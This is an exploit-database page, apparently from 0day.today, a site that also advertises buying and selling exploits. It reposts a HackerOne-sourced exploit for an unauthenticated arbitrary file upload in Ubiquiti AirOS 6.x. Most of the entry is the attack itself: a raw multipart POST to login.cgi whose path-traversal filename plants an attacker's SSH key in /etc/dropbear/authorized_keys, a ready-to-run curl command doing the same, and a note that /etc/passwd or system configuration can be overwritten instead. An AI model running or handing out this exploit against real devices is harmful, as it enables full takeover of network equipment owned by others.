0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ [email protected] ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AirOS 6.x - Arbitrary File Upload
EDB-Note Source: https://hackerone.com/reports/73480 Vulnerability It's possible to overwrite any file (and create new ones) on AirMax systems, because the "php2" (maybe because of a patch) don't verify the "filename" value of a POST request. It's possible to a unauthenticated user to exploit this vulnerability. Example Consider the following request: POST https://192.168.1.20/login.cgi HTTP/1.1 Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860 Content-Length: 773 User-Agent: Jakarta Commons-HttpClient/3.1 Host: 192.168.1.20 Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/; ui_language=en_US -----------------------------72971515916103336881230390860 Content-Disposition: form-data; name="keyfile"; filename="../../etc/dropbear/authorized_keys" Content-Type: application/vnd.ms-publisher {{Your Public Key HERE}} -----------------------------72971515916103336881230390860-- The web server must filter the file name ../../etc/dropbear/authorized_keys to just authorized_keys or return a 404. But the AirMax just received the file, overwriting the original (creating if don't exist) in the process. In this case the attacker are uploading arbitrary public ssh keys, but it can be used to upload configurations, or "/etc/passwd"... Consequences It's possible to take control over any AirMax Product with simple forged http POST request, what it disastrous. Reproducing With a simple command: curl -F "[email protected]/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k Of course if the ssh is disabled you can overwrite /etc/passwd and/or /tmp/system.cfg. # 0day.today [2024-03-28] #